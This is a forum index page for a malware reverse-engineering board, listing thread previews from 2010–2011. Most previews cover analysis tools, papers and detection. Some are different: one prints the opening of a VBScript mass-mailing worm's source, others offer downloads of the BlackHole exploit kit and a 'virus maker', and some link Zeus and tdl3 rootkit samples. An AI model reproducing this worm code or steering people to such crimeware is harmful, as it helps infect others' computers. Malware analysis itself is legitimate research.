Malware Reverse Engineering

360 topics in this forum

1. 

   Maleware selfchecking Zeus Bot

   August 12, 2011 by ltheonel

   • 2 replies
   • 4.6k views

   Since noboy is interested, thread can be deleted please. zbot.zip

   

   Last reply by Teddy Rogers, September 1, 2011
2. 

   HITB Magazines

   August 24, 2011 by C0M3ND4D0R

   • 0 replies
   • 9.6k views

   A collection of (so far) 6 magazines HITB.......on malware analysis and exploiting among other issues free distribution http://magazine.hackinthebox.org/hitb-magazine.html

   

   Last reply by C0M3ND4D0R, August 24, 2011
3. 

   Malware Using Right to Left Override Unicode

   August 21, 2011 by Sina_DiR

   • 6 replies
   • 5.4k views

   This is the new trick in Unicode string that could deceive users to open and exe file that showing pdf txt etc. It could be new way to spammers For more information check out F-Secure analyze: Redirect to F-Secure

   

   Last reply by Sina_DiR, August 22, 2011
4. 

   How do I get a flash drive infected with stuxnet?

   August 18, 2011 by malfreak

   • 1 reply
   • 4.7k views

   I downloaded stuxnet from http://tuts4you.com/download.php?view.3011. The files seem valid as I scanned the contents at virustotal. Then I inserted a flash drive and executed the dropper.exe file. According to Microsoft (http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx), the dropper (TrojanDropper:Win32/StuxnetA) should drop the following into the system: Worm:Win32/Stuxnet.A Trojan:WinNT/Stuxnet.A Trojan:WinNT/Stuxnet.B (initially called VirTool:WinNT/Rootkitdrv.HK) Trojan:Win32/Stuxnet.A Worm:Win32/Stuxnet.B Although, it seemed to have triggered some components of stuxnet,(the shortcut and tmp files got hidden, so the rootkit was on its way) I a…

   

   Last reply by deepzero, August 18, 2011
5. 

   Honeynet Project Challenge 9...

   August 17, 2011 by Teddy Rogers

   • 1 reply
   • 4.2k views

   Honeynet Project Challenge 9 Submissions to be submitted by September 4th 2011. https://www.honeynet.org/node/751 http://malphx.free.f...es-final.tar.gz Ted.

   

   Last reply by evlncrn8, August 17, 2011
6. 

   Sophail: A Critical Analysis of Sophos Antivirus

   August 5, 2011 by mudlord

   • 0 replies
   • 4.2k views

   A nice paper I found on the utter trash that is Sophos.... />http://lock.cmpxchg8b.com/Sophail.pdf Sophail.pdf

   

   Last reply by mudlord, August 5, 2011

   • 
7. 

   Joebox

   December 29, 2010 by CodeExplorer

   • 2 replies
   • 7k views

   Joebox Joebox is an extensive runtime analysis system. It is designed for automatic runtime analysis of malware and other software on Windows based operating systems. Joebox executes a potential malicious program on a full Windows system and observes the behavior of the program during execution. It manages the complete analysis cycle automatically. Link: />http://www.joebox.ch/

   

   Last reply by k5h, July 31, 2011
8. 

   How Digital Detectives Deciphered Stuxnet...

   July 12, 2011 by Teddy Rogers

   • 2 replies
   • 4.3k views

   />http://www.wired.com/threatlevel/2011/07/how-digital-detectives-deciphered-stuxnet/all/1 Ted.

   

   Last reply by cozofdeath, July 30, 2011
9. 

   Patent application title: Heuristic detection of malicious code

   July 12, 2011 by CodeExplorer

   • 1 reply
   • 5.9k views

   Patent application title: Heuristic detection of malicious code />http://www.faqs.org/patents/app/20090013405

   

   Last reply by metr0, July 12, 2011
10. 

    Monthly Malware Statistics, June 2011

    July 6, 2011 by News Feeder

    • 1 reply
    • 3.9k views

    The following statistics were compiled in June using data from computers running Kaspersky Lab products: 249,345,057 network attacks blocked. View the full article

    

    Last reply by dn5, July 8, 2011
11. 

    Can i attach a c-file to a c-compiler?

    June 21, 2011 by tukki_2020

    • 3 replies
    • 6.2k views

    Hey guys, i just want to brainstorm an idea so please be patient. I have made a c-program which writes all the images(rgb content) in a folder to a structure in another c-file( along with the needed code to compile and execute) and deletes the images. Now if i compile and run the new .c-file, i am able to restore these images lets say on providing a password or something. But of-course i need a c-compiler to do the compiling. So i have the question: 1.> I want to make it independent in the sense that i want the compiler to travel with the original exe file and later when needed it compiles the second c-file that contains the structure for the images. Is it possible? t…

    

    Last reply by ghandi, June 28, 2011
12. 

    How do AV systems find packed Malicious Software

    March 1, 2010 by GoJonnyGo

    • 11 replies
    • 9.7k views

    Hi there, i am wondering, how antivirus systems can find viruses in packed software. Do they know every unpacking routine and first look at with with protector it is packed and unpack it then to perform a search or do they wait till the exe unpacked itself and is on oep or how does this happen?

    

    Last reply by chickenbutt, May 28, 2011

    • 
13. 

    BlackHole Exploit Kit 1.0.2 - Download !

    May 24, 2011 by Guest zikmik

    • 3 replies
    • 6.8k views

    First Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit. Black Market Cost : Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license inc…

    

    Last reply by CodeExplorer, May 24, 2011

    • 
14. 

    automated analysis by Comodo

    May 22, 2011 by deepzero

    • 0 replies
    • 3.7k views

    just saw that Comodo offers an automated malware analysis service: http://camas.comodo.com/cgi-bin/submitwhich indeed seems to output lots of interesting information.

    

    Last reply by deepzero, May 22, 2011
15. 

    VM Detecting in malware

    May 12, 2011 by Pooya

    • 1 reply
    • 6.3k views

    Hi Guys As I've been searching through this topic , I've got some interesting picture aside of VM Fingerprints.... like I/O Backdoor in VMware... but my main question is that how to find a way like VMware Method ? I've read that the more reliable technique for detecting is relying on assembly-level code that behaves differently in VM... so how can I observe this behavior ??? Any little tiny clue would be appreciated Best Regards

    

    Last reply by chickenbutt, May 13, 2011
16. 

    Paper: Hunting rootkits with Windbg

    January 22, 2011 by frank_boldewin

    • 2 replies
    • 6.8k views

    Here are the slides to my talk "Hunting rootkits with Windbg" at the Ruhr University of Bochum yesterday. I'll introduce several ways to find well known rootkits like Rustock or TDL Versions 3+4 with Windbg and scripts. Enjoy! Paper The Windbg script shown in the slides to grab Kernelcallbacks can be found here: Windbg Script

    

    Last reply by Pooya, May 11, 2011

    • 
17. 

    Trojan-PSW.Win32.OnLineGames.eos

    May 16, 2008 by Teddy Rogers

    • 7 replies
    • 6.1k views

    Win32OnlineGames.txt Ted.

    

    Last reply by ghandi, April 1, 2011
18. 

    tdl3 rootkit - source

    March 30, 2011 by deepzero

    • 0 replies
    • 5.6k views

    This source of the tdl3 rootkit driver has been floating around for some time now, might be a interesting read for some people.... http://pastebin.com/he4hVjQ1

    

    Last reply by deepzero, March 30, 2011
19. 

    Generate md5 hash

    March 27, 2011 by RKN

    • 5 replies
    • 6.6k views

    Zip file contains two malwares . Target is to unpack and calculate the md5hash of the unpacked malware. This was asked in hacking competetion (InCTF)) and my solution was not accepted ,so I want to know the answer. http://rapidshare.co...9/New_Folder.7z

    

    Last reply by kao, March 29, 2011
20. 

    Waledac worm required

    February 28, 2011 by hackers3

    • 2 replies
    • 5.8k views

    Request for Waledac worm download link for analysis. Thanks

    

    Last reply by Coderess, March 13, 2011
21. 

    Dynamic forking in action

    February 20, 2011 by CodeExplorer

    • 0 replies
    • 3.7k views

    Dynamic forking in action />http://zairon.wordpress.com/

    

    Last reply by CodeExplorer, February 20, 2011
22. 

    www.support.me

    February 10, 2011 by Teddy Rogers

    • 6 replies
    • 23.3k views

    Today I got a cold call from a woman claiming my computer had been playing up because I had accessed a webpage with a virus or opened SPAM with malware. Normally I put the phone down on cold calls but at the mention of a computer security issue I had to play along for a laugh to see what was up. This type of computer scam (cold call malware) is new to me. She asked me to go to Event Viewer and check the Application error logs and unsurprisingly there were a lot of errors and warnings. This is of course to legitimise the reason for the call and to justify what was to happen next. She asked me to go to www.support.me which then redirected me to https://secure.logmeinrescue.…

    

    Last reply by Departure, February 16, 2011
23. 

    JPS VIRUS MAKER

    January 12, 2011 by fahmi

    • 2 replies
    • 10.7k views

    :thumbsup: download

    

    Last reply by fahmi, February 2, 2011
24. 

    DotNetaspoilt

    August 17, 2010 by sirp

    • 1 reply
    • 9.1k views

    Quote: DotNetaspoilt is a very capable code injector, making it possible to inject and edit code and GUI controls into .NET applications in an interactive fashion. Code: />http://anonym.to/?http://digitalbodyguard.com/DotNetasploit.html Code: />http://anonym.to/?http://www.woodmann.com/collaborative/tools/images/Bin_DotNetasploit_2010-8-17_3.39_dotnetasploit25.zip and here is a pack with all the stuff VIDS: Injector Visual Studio Exploit - no code is safe DotNetSploit Overview DotNetaSploit Tools : DotNetSpike MetaSploit - Payload Deployment Targeted Attacks DotNetasploitEXE PDF : Attacking .Net at Runtime ReflectionsHiddenPower />http://anonym.to/?http://depo…

    

    Last reply by drcrack2010, January 13, 2011
25. 

    make virus I hate Mawanella incident

    January 10, 2011 by fahmi

    • 0 replies
    • 3.6k views

    virus i hate mawanella incident On Error Resume Next Rem // I hate Mawanella incident Set W_S = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr, strMsg set wscr=CreateObject("WScript.Shell") Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set cFile = fso.GetFile(WScript.ScriptFullName) cFile.Copy(dirsystem&"\Mawanella.vbs") Set OutlookA = CreateObject("Outlook.Application") If OutlookA = "Outlook" Then Set Mapi=OutlookA.GetNameSpace("MAPI") Set…

    

    Last reply by fahmi, January 10, 2011